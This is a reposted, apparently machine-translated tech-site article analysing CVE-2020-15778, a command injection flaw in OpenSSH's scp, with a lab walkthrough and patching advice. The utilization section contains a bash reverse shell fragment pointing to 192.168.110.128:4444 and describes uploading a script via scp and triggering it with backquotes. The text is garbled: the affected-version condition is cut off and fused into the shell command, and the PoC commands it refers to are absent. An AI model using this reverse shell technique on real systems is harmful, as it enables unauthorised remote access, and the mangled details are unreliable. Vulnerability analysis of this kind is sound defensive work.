Shulou(Shulou.com)05/31 Report--

This article mainly introduces the example analysis of OpenSSH command injection vulnerability, the article is very detailed, has a certain reference value, interested friends must read it!

Vulnerability description

Vulnerability number: CVE-2020-15778

SCP (secure copy) is a program that copies files between two computers, using the ssh protocol. It is included by default in most linux and unix distributions. The program is implemented by scp.c of openssh and other related codes.

The root cause of the vulnerability is that remote command parameters are not properly filtered somewhere in the scp.c file, resulting in remote execution of arbitrary commands. Detailed analysis, read on.

Utilization condition

1. Target server openssh version & / dev/tcp/192.168.110.128/4444 0 > & 1

The bounce shell command is parsed as follows:

The command states that bash-I generates an interactive bash > & / dev/tcp/192.168.110.128/4444 to establish a TCP connection and redirects standard output and errors to the TCP connection 0 > & 1 to get input from the TCP connection

Transfer the kali.sh file remotely to the specified directory in centos through the scp command:

The transferred kali.sh file can be found in centos:

Listen on port 4444 on kali:

Execute the following poc to execute the uploaded bounce shell:

You can observe that kali has successfully connected to centos:

In linux, the contents of the backquotes will be executed as shell commands. Note that backquotes are used in poc, not single quotes.

Vulnerability repair

1. Update openssh to the latest version

two。 Disable scp

3. Ensure the security of ssh passwords to prevent them from being compromised or violently cracked

The above is all the contents of the article "sample Analysis of OpenSSH Command injection vulnerabilities". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.